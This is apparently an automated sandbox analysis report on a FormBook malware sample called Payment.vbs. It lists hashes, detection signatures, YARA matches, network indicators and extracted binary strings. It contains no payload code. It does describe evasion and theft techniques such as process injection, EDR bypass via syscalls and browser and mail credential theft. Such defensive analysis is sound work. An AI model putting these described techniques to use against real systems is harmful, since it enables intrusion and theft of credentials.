Windows Analysis Report
Payment.vbs

Overview

General Information

Sample name: Payment.vbs
Analysis ID: 1528048
MD5: de0d7fea05e69a8cf4b7c6071735b141
SHA1: cc1218cab6f6bccd985a32b443f47ffa2c7bb8b5
SHA256: 1ace0faeac611f4f52e524e7f6ebf4bfd7ca7d1c697427d0828b3368854d9c7c
Tags: vbs, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign process
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: Yara match File source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49842 version: TLS 1.2
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: appidtel.exe, appidtel.exe, 0000000A.00000003.2629248061.0000000003729000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000003.2627277075.000000000357A000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, convert.exe, 00000013.00000003.2729543157.00000000032CB000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2733109530.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.00000000037FE000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.0000000003660000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: appidtel.pdb source: convert.exe, 00000013.00000002.2977602776.0000000003C8C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3537079576.000000000259C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3534781987.000000002F20C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: appidtel.exe, 0000000A.00000003.2629248061.0000000003729000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000003.2627277075.000000000357A000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2729543157.00000000032CB000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2733109530.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.00000000037FE000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.0000000003660000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: convert.pdb source: appidtel.exe, 0000000A.00000002.2727615136.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536147480.0000000001288000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000003.2670887482.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: convert.pdbGCTL source: appidtel.exe, 0000000A.00000002.2727615136.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536147480.0000000001288000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000003.2670887482.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mNqSPruzCXM.exe, 00000011.00000000.2643006321.000000000026E000.00000002.00000001.01000000.00000006.sdmp, mNqSPruzCXM.exe, 00000018.00000000.2801120472.000000000026E000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
